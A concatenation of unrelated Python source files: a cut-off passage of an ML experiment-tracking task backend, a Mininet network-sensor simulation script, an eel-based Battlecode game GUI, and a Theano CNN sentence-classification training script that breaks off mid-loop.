if model_type == 'input':
regex = r'((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
# noinspection PyBroadException
try:
# make sure the model is is valid
# noinspection PyProtectedMember
m._get_model_data()
in_model.append(m)
except Exception:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we ae using forced update, make sure he task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new tasks's ID.
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(self, max_events=100):
# type: (int) -> Any
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
@property
def _edit_lock(self):
# type: () -> ()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'trains_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Union[str, Task]) -> ()
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> ()
"""
Set offline mode, where all data and logs are stored into local folder, for later transmission
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return offline-mode state, If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
|
start_net_and_sensor.py
|
# coding=utf-8
import os, sys, pdb
from threading import Thread, Lock, Condition
topo_path = os.path.abspath(os.path.join('..', '..', 'Topology'))
sen_path = os.path.abspath(os.path.join('..', '..', 'Sensor'))
blk_path = os.path.abspath(os.path.join('..', '..', 'Blockchain'))
sys.path.insert(0, topo_path)
sys.path.insert(0, sen_path)
sys.path.insert(0, blk_path)
from create_merge_topo import *
from sensor import *
from client import *
cv = Condition()
lock = Lock()
count = 0
nt = None
discovered_ips = []
def stop_net(net):
net.stop()
def start_net():
''' Start Mininet Topology'''
topo = NetworkTopo()
net = Mininet( topo=topo )
add_static_routes(net)
net.start()
return net
def run(i, hosts, lock, cv):
global count
global nt
alias = create_alias()
lock.acquire()
compute_distances(net, hosts)
count += 1
lock.release()
cv.acquire()
if count < int(nt):
cv.wait()
else:
cv.notify_all()
cv.release()
lock.acquire()
create_traces(net, hosts)
lock.release()
(vtopo, traces) = create_virtual_topo_and_traces(alias, hosts)
(M,C) = create_merge_options(vtopo, traces)
(M, mtopo) = create_merge_topology(M, vtopo, C)
out = write_topo_to_file(i, mtopo, hosts)
c = configure_client("client1_config.json")
register_client(c)
#tfile = get_topo_filename("client1_config.json")
topo = get_topo_from_json(out)
trans = get_transactions_from_topo(topo)
c.send_transactions(trans)
def parse_cmd_line():
nt = sys.argv[1]
hosts = sys.argv[2:]
return (nt, hosts)
def startup(nt, hosts):
threads = []
for i in range(int(nt)):
thread = Thread(target=run, args=(i, hosts, lock, cv))
threads.append(thread)
thread.start()
for t in threads:
t.join()
print 'Threads finished'
def block_router(net, r):
cmd1 = 'iptables -P OUTPUT DROP'
cmd2 = 'iptables -P INPUT DROP'
cmd3 = 'iptables -P FORWARD DROP'
net[r].cmd(cmd1)
net[r].cmd(cmd2)
net[r].cmd(cmd3)
print '\nBlocked router ' + net[r].IP()
def unblock_router(net, r):
cmd1 = 'iptables -P OUTPUT ACCEPT'
cmd2 = 'iptables -P INPUT ACCEPT'
cmd3 = 'iptables -P FORWARD ACCEPT'
net[r].cmd(cmd1)
net[r].cmd(cmd2)
net[r].cmd(cmd3)
print '\nUnBlocked router ' + net[r].IP()
if __name__ == '__main__':
if len(sys.argv) < 2:
print """\nUsage: python start.py <nt> <hosts>\n
<nt> = number of threads to be used to collect traces\n
<hosts> = sequence of hosts, separated by whitespace, that
each thread will use deterministically\n"""
sys.exit()
(net,topo) = start_network_number(1)
# Delete previously generated files..
os.system('./init.sh')
(nt, hosts) = parse_cmd_line()
# Spawn the threads that will run iTop and store the topology induced from each thread in the Blockchain
startup(nt, topo.sensors)
ips = get_responding_ips(hosts)
# Start one sensor
s = sensor('r3', 5, net, 'sensor_config.json', max_fail=3,
known_ips=ips, simulation=True, verbose=False)
s.start()
raw_input("\n\nPress any key when you want to tear down R5\n\n")
print '\nTearing down router R5...\n'
block_router(net, 'r5')
raw_input("\n\nPress any key when you want to run again R5\n\n")
unblock_router(net, 'r5')
time.sleep(5)
net.pingAll()
raw_input("\n\nPress any key when you want to quit\n\n")
s.stop()
|
gui.py
|
import eel
import os
import battlecode_cli as cli
import threading
import sys
import json
import signal
import psutil
import player_plain
import battlecode as bc
target_dir = os.path.abspath(os.path.dirname(__file__))
print('Moving into', target_dir)
os.chdir(target_dir)
options = {'host':'0.0.0.0', 'port':6147, 'mode':'default'}
if sys.platform == 'win32':
options['host'] = 'localhost'
print('Starting eel')
eel.init('web')
game = None
def start_game(return_args):
global WINNER
WINNER = 0
# check mountpoint for maps first
c2 = os.path.abspath(os.path.join('/player/battlecode-maps', return_args['map']))
if 'NODOCKER' not in os.environ and os.path.exists(c2):
return_args['map'] = cli.get_map(c2)
else:
c1 = os.path.abspath(os.path.join('..', 'battlecode-maps', return_args['map']))
if os.path.exists(c1):
return_args['map'] = cli.get_map(c1)
else:
if 'testmap' not in return_args['map']:
print("Can't find map {} in {}, falling back to test map..",
return_args['map'],
os.path.abspath(os.path.join('..', 'battlecode-maps'))
)
if 'NODOCKER' not in os.environ:
print('(Also looked in /player/battlecode-maps, which should be mounted to the battlecode-maps directory of your scaffold)')
return_args['map'] = bc.GameMap.test_map()
if 'NODOCKER' in os.environ:
return_args['docker'] = False
return_args['dir_p1'] = os.path.abspath(os.path.join('..', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('..', return_args['dir_p2']))
else:
return_args['docker'] = True
return_args['dir_p1'] = os.path.abspath(os.path.join('/player', return_args['dir_p1']))
return_args['dir_p2'] = os.path.abspath(os.path.join('/player', return_args['dir_p2']))
return_args['terminal_viewer'] = False
return_args['extra_delay'] = 0
global game
(game, dockers, sock_file) = cli.create_game(return_args)
winner = None
try:
print("Running game...")
winner = cli.run_game(game, dockers, return_args, sock_file)
finally:
cli.cleanup(dockers, return_args, sock_file)
lock.release()
if winner == 'player1':
eel.trigger_end_game(1)()
elif winner == ' player2':
eel.trigger_end_game(2)()
else:
eel.trigger_end_game(0)()
print("Ready to run next game.")
@eel.expose
def get_viewer_data(turn):
if game != None and len(game.manager_viewer_messages) >= 1:
if turn >= len(game.manager_viewer_messages) or turn == -1:
turn = len(game.manager_viewer_messages) - 1
message = json.loads(game.manager_viewer_messages[turn])
message['turn'] = turn
return message
else :
return {'width':0, 'height': 0, 'earth' : [], 'mars': [], 'turn':0}
@eel.expose
def run_game(return_args):
if not lock.acquire(blocking=False):
return "Fail"
t1 = threading.Thread(target=start_game,args=(return_args,))
t1.start()
return "success"
@eel.expose
def get_maps():
if 'NODOCKER' in os.environ:
map_dir = os.path.abspath('../battlecode-maps')
else:
map_dir = '/battlecode/battlecode-maps'
maps = [o for o in os.listdir(map_dir)
if 'bc18map' in o or 'bc18t' in o]
maps.append('testmap.bc18map')
if 'NODOCKER' not in os.environ:
try:
for o in os.listdir('/player/battlecode-maps'):
if o not in maps:
maps.append(o)
except:
pass
return maps
@eel.expose
def get_player_dirs():
if 'NODOCKER' in os.environ:
player_dir = os.path.abspath('..')
else:
player_dir = '/player'
players = []
for o in os.listdir(player_dir):
if o.startswith('.') or o in ('battlecode', 'battlecode-manager'):
continue
full_path = os.path.join(player_dir, o)
if not os.path.isdir(full_path):
continue
if os.path.exists(os.path.join(full_path, 'run.sh')):
players.append(o)
return players
# if 0 not ended, if 1 red, 2 blue
@eel.expose
def get_player_logs():
if game != None:
if all('logger' in player for player in game.players):
logs = [player['logger'].logs.getvalue() for player in game.players]
return logs
else:
return ["", "", "", ""]
return ["NULL", "NULL", "NULL", "NULL"]
@eel.expose
def end_game():
global game
if game is not None:
game.winner = 'player3'
game.disconnected = True
game.game_over = True
return ""
def reap_children(timeout=3):
"Tries hard to terminate and ultimately kill all the children of this process."
def on_terminate(proc):
pass
# print("process {} terminated with exit code {}".format(proc, proc.returncode))
procs = psutil.Process().children(recursive=True)
# send SIGTERM
for p in procs:
p.terminate()
gone, alive = psutil.wait_procs(procs, timeout=timeout, callback=on_terminate)
if alive:
# send SIGKILL
for p in alive:
# print("process {} survived SIGTERM; trying SIGKILL" % p.pid)
p.kill()
gone, alive = psutil.wait_procs(alive, timeout=timeout, callback=on_terminate)
if alive:
# give up
for p in alive:
print("process {} survived SIGKILL; giving up" % p.pid)
@eel.expose
def stop_manager():
print("Shutting manager down.")
player_plain.reap(psutil.Process())
procs = psutil.Process().kill()
print("=== Ready! ===")
print("To play games open http://localhost:6147/run.html in your browser on Mac/Linux/WindowsPro, or http://192.168.99.100:6147/run.html on Windows10Home.")
lock = threading.Lock()
eel.start('run.html', options=options, block=False)
while True:
eel.sleep(1.0)
|
conv_net_sentence2_parallel.py
|
"""
Sample code for
Convolutional Neural Networks for Sentence Classification
http://arxiv.org/pdf/1408.5882v2.pdf
Much of the code is modified from
- deeplearning.net (for ConvNet classes)
- https://github.com/mdenil/dropout (for dropout)
- https://groups.google.com/forum/#!topic/pylearn-dev/3QbKtCumAW4 (for Adadelta)
"""
import cPickle
import numpy as np
from collections import defaultdict, OrderedDict
import theano
import theano.tensor as T
from theano import tensor as printing
import re
import warnings
import sys
import time
from multiprocessing import Process
from conv_net_classes import *
warnings.filterwarnings("ignore")
#different non-linearities
def ReLU(x):
y = T.maximum(0.0, x)
return(y)
def Sigmoid(x):
y = T.nnet.sigmoid(x)
return(y)
def Tanh(x):
y = T.tanh(x)
return(y)
def Iden(x):
y = x
return(y)
# parallel_id: 0, 1, ..., 10
# parallel_num: 10
def cand_output(parallel_id, parrallel_num, parallel_batch_size, type, iteration_i, label, best_val_perf, cand_n_test_batches, \
cand_test_model_all_3, cand_test_model_final_layer, batch_size, cand_test_y, datasets2_shape0):
#start_time = time.time()
cand_output_test = open("mr_folder_" + type + "_event_words/" + iteration_i + "/cand_true_and_pred_value" + str(label) + '_' + str(parallel_id), 'w')
if best_val_perf != 0:
if parallel_id <= parrallel_num - 1:
for i in xrange(parallel_id * parallel_batch_size, (parallel_id + 1) * parallel_batch_size ):
cand_test_y_pred_cur = cand_test_model_all_3(i)
cand_test_y_final_layer = cand_test_model_final_layer(i)
#print "i: ", i
for j in range(0, batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
try: # IndexError: index 153926 is out of bounds for axis 0 with size 153926
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
except IndexError:
pass
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
else:
for i in xrange(parallel_id * parallel_batch_size, cand_n_test_batches):
cand_test_y_pred_cur = cand_test_model_all_3(i)
cand_test_y_final_layer = cand_test_model_final_layer(i)
if i != cand_n_test_batches - 1:
for j in range(0, batch_size):
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
else:
for j in range(0, datasets2_shape0 % batch_size):
#print j, ' ',
#output_test.write( str(test_set_y[i * batch_size + j ].eval()) + '\t' + str(test_y_pred_cur[j]) + '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.write(str(cand_test_y[i * batch_size + j]) + '\t' + str(cand_test_y_pred_cur[j]) + '\t' + str(cand_test_y_final_layer[j]) + '\n' )
#output_test.write( '\t' + str(test_y_final_layer[j]) + '\n' )
cand_output_test.close()
#print "testing time: ", time.time()-start_time
else:
cand_output_test.close()
#print "testing time: ", time.time()-start_time
def train_conv_net(iteration_i, type, label, datasets,
U,
img_w=300,
filter_hs=[3, 4, 5],
hidden_units=[100,3],
dropout_rate=[0.5],
shuffle_batch=True,
n_epochs=25,
batch_size=100,
lr_decay = 0.95,
conv_non_linear="relu",
activations=[Iden],
sqr_norm_lim=9,
non_static=True,
):
"""
Train a simple conv net
img_h = sentence length (padded where necessary)
img_w = word vector length (300 for word2vec)
filter_hs = filter window sizes
hidden_units = [x,y] x is the number of feature maps (per filter window), and y is the penultimate layer
sqr_norm_lim = s^2 in the paper
lr_decay = adadelta decay parameter
"""
print U
print len(U)
print len(U[0])
#raw_input("continue?")
rng = np.random.RandomState(3435)
img_h = len(datasets[0][0])-1
#t_img_h = len(test_dataset[0][0])-1
#print "img_h, t_img_h: ", img_h, ', ', t_img_h
filter_w = img_w
feature_maps = hidden_units[0]
filter_shapes = []
pool_sizes = []
for filter_h in filter_hs:
filter_shapes.append((feature_maps, 1, filter_h, filter_w))# feature_maps = 100; filter_h = 3, 4, 5; filter_w = 300
pool_sizes.append((img_h-filter_h+1, img_w-filter_w+1))
parameters = [("image shape",img_h,img_w),("filter shape",filter_shapes), ("hidden_units",hidden_units),
("dropout", dropout_rate), ("batch_size",batch_size),("non_static", non_static),
("learn_decay",lr_decay), ("conv_non_linear", conv_non_linear), ("non_static", non_static)
,("sqr_norm_lim",sqr_norm_lim),("shuffle_batch",shuffle_batch)]
print parameters
#define model architecture
# generate symbolic variables for input (x and y represent a
# minibatch)
index = T.lscalar()
x = T.matrix('x') # data, presented as rasterized images
y = T.ivector('y') # labels, presented as 1D vector of [int] labels
Words = theano.shared(value = U, name = "Words")
zero_vec_tensor = T.vector()
zero_vec = np.zeros(img_w)
set_zero = theano.function([zero_vec_tensor], updates=[(Words, T.set_subtensor(Words[0,:], zero_vec_tensor))], allow_input_downcast=True)
layer0_input = Words[T.cast(x.flatten(),dtype="int32")].reshape((x.shape[0],1,x.shape[1],Words.shape[1]))
conv_layers = []
layer1_inputs = []
for i in xrange(len(filter_hs)):
filter_shape = filter_shapes[i]
pool_size = pool_sizes[i]
conv_layer = LeNetConvPoolLayer(rng, input=layer0_input,image_shape=(batch_size, 1, img_h, img_w),
filter_shape=filter_shape, poolsize=pool_size, non_linear=conv_non_linear)
layer1_input = conv_layer.output.flatten(2)
conv_layers.append(conv_layer)
layer1_inputs.append(layer1_input)
layer1_input = T.concatenate(layer1_inputs,1)
hidden_units[0] = feature_maps*len(filter_hs)
classifier = MLPDropout(rng, input=layer1_input, layer_sizes=hidden_units, activations=activations, dropout_rates=dropout_rate)
#define parameters of the model and update functions using adadelta
params = classifier.params
for conv_layer in conv_layers:
params += conv_layer.params
if non_static:
#if word vectors are allowed to change, add them as model parameters
params += [Words]
cost = classifier.negative_log_likelihood(y)
dropout_cost = classifier.dropout_negative_log_likelihood(y)
grad_updates = sgd_updates_adadelta(params, dropout_cost, lr_decay, 1e-6, sqr_norm_lim)
#shuffle dataset and assign to mini batches. if dataset size is not a multiple of mini batches, replicate
#extra data (at random)
print "datasets[0].shape[0]: ", datasets[0].shape[0]
np.random.seed(3435)
if datasets[0].shape[0] % batch_size > 0:
extra_data_num = batch_size - datasets[0].shape[0] % batch_size
train_set = np.random.permutation(datasets[0])
extra_data = train_set[:extra_data_num]
new_data=np.append(datasets[0],extra_data,axis=0)
else:
new_data = datasets[0]
print "datasets[1].shape[0]: ", datasets[1].shape[0]
if datasets[1].shape[0] % batch_size > 0:
extra_data_num = batch_size - datasets[1].shape[0] % batch_size
test_set = np.random.permutation(datasets[1])
extra_data = test_set[:extra_data_num]
test_new_data=np.append(datasets[1],extra_data,axis=0)
else:
test_new_data = datasets[1]
print "test_new_data.shape[0]: ", test_new_data.shape[0]
n_test_batches = test_new_data.shape[0]/batch_size
print "datasets[2].shape[0]: ", datasets[2].shape[0]
if datasets[2].shape[0] % batch_size > 0:
extra_data_num = batch_size - datasets[2].shape[0] % batch_size
test_set = np.random.permutation(datasets[2])
extra_data = test_set[:extra_data_num]
cand_test_new_data=np.append(datasets[2],extra_data,axis=0)
else:
cand_test_new_data = datasets[2]
print "cand_test_new_data.shape[0]: ", cand_test_new_data.shape[0]
cand_n_test_batches = cand_test_new_data.shape[0]/batch_size
"""
length = len(new_data)
print length
new_data_part1 = np.random.permutation(new_data[:train_val_boundary, :])
new_data_part2 = np.random.permutation(new_data[train_val_boundary:, :])
new_data = np.append(new_data_part1, new_data_part2, axis = 0)
"""
new_data = np.random.permutation(new_data)
#ratio = float(train_val_boundary) / float(new_data.shape[0])
#print ratio
n_batches = new_data.shape[0]/batch_size
n_train_batches = int(np.round(n_batches*0.9))
#n_train_batches = int(np.round(n_batches*ratio))
#divide train set into train/val sets
#test_set_x = datasets[1][:,:img_h]
#test_set_y = np.asarray(datasets[1][:,-1],"int32")
test_y = np.asarray(datasets[1][:,-1],"int32")
test_set = test_new_data[:n_test_batches * batch_size, :]
cand_test_y = np.asarray(datasets[2][:,-1],"int32")
cand_test_set = cand_test_new_data[:cand_n_test_batches * batch_size, :]
train_set = new_data[:n_train_batches*batch_size,:]
#train_set = train_new_data[:n_train_batches*batch_size,:]
val_set = new_data[n_train_batches*batch_size:,:]
train_set_x, train_set_y = shared_dataset((train_set[:,:img_h],train_set[:,-1]))
val_set_x, val_set_y = shared_dataset((val_set[:,:img_h],val_set[:,-1]))
test_set_x, test_set_y = shared_dataset((test_set[:,:img_h], test_set[:, -1]))
cand_test_set_x, cand_test_set_y = shared_dataset((cand_test_set[:,:img_h], cand_test_set[:, -1]))
n_val_batches = n_batches - n_train_batches
#n_val_batches = t_n_batches
val_model = theano.function([index], classifier.errors(y),
givens={
x: val_set_x[index * batch_size: (index + 1) * batch_size],
y: val_set_y[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
#val_output_sigmoid = theano.function([index], classifier.predict_p(val_set_x[index * batch_size: (index + 1) * batch_size]))
#compile theano functions to get train/val/test errors
#classifier = MLPDropout(rng, input=layer1_input, layer_sizes=hidden_units, activations=activations, dropout_rates=dropout_rate)
test_model = theano.function([index], classifier.errors(y),
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
real_test_model = theano.function ( [index], classifier.errors(y),
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size],
y: test_set_y[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
train_model = theano.function([index], cost, updates=grad_updates,
givens={
x: train_set_x[index*batch_size:(index+1)*batch_size],
y: train_set_y[index*batch_size:(index+1)*batch_size]},
allow_input_downcast = True)
print "\n*****************************"
print train_set_y.eval()
#print type(test_set_y)
test_pred_layers = []
test_size = test_set_x.shape[0].eval()
print "test_size = test_set_x.shape[0]: ", test_size
print "x.flatten(): ", x.flatten()
print "img_h: ", img_h
print "Words.shape[0]: ", Words.shape[0].eval()
print "Words.shape[1]: ", Words.shape[1].eval()
# x.flatten(): A copy of the input array, flattened to one dimension.
#test_layer0_input = Words[T.cast(x.flatten(),dtype="int32")].reshape((test_size,1,img_h,Words.shape[1])) # change test_size to batch_size
test_layer0_input = Words[T.cast(x.flatten(),dtype="int32")].reshape((x.shape[0],1,x.shape[1],Words.shape[1]))
for conv_layer in conv_layers:
test_layer0_output = conv_layer.predict(test_layer0_input, batch_size) # change test_size to batch_size
test_pred_layers.append(test_layer0_output.flatten(2))
test_layer1_input = T.concatenate(test_pred_layers, 1)
print "test_layer1_input: ", test_layer1_input
test_y_pred = classifier.predict(test_layer1_input)
test_y_pred_p = classifier.predict_p(test_layer1_input)
test_error = T.mean(T.neq(test_y_pred, y))
test_model_all = theano.function([x,y], test_error, allow_input_downcast = True)
#test_model_all_3 = theano.function([x], test_y_pred, allow_input_downcast=True)
#test_model_final_layer = theano.function([x], test_y_pred_p, allow_input_downcast=True)
test_model_all_3 = theano.function([index], test_y_pred,
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size]}, allow_input_downcast=True)
test_model_final_layer = theano.function([index], test_y_pred_p,
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
cand_test_model_all_3 = theano.function([index], test_y_pred,
givens={
x: cand_test_set_x[index * batch_size: (index + 1) * batch_size]}, allow_input_downcast=True)
cand_test_model_final_layer = theano.function([index], test_y_pred_p,
givens={
x: cand_test_set_x[index * batch_size: (index + 1) * batch_size]},
allow_input_downcast=True)
#start training over mini-batches
print '... training'
epoch = 0
best_val_perf = 0
val_perf = 0
test_perf = 0
cost_epoch = 0
while (epoch < n_epochs):
#while (epoch < 1):
start_time = time.time()
epoch = epoch + 1
if shuffle_batch:
for minibatch_index in np.random.permutation(range(n_train_batches)):
cost_epoch = train_model(minibatch_index)
set_zero(zero_vec)
else:
for minibatch_index in xrange(n_train_batches):
cost_epoch = train_model(minibatch_index)
set_zero(zero_vec)
train_losses = [test_model(i) for i in xrange(n_train_batches)]
train_perf = 1 - np.mean(train_losses)
val_losses = [val_model(i) for i in xrange(n_val_batches)]
val_perf = 1- np.mean(val_losses)
print label,
print(' epoch: %i, training time: %.2f secs, train perf: %.2f %%, val perf: %.2f %%' % (epoch, time.time()-start_time, train_perf * 100., val_perf*100.))
if val_perf >= best_val_perf:
best_val_perf = val_perf
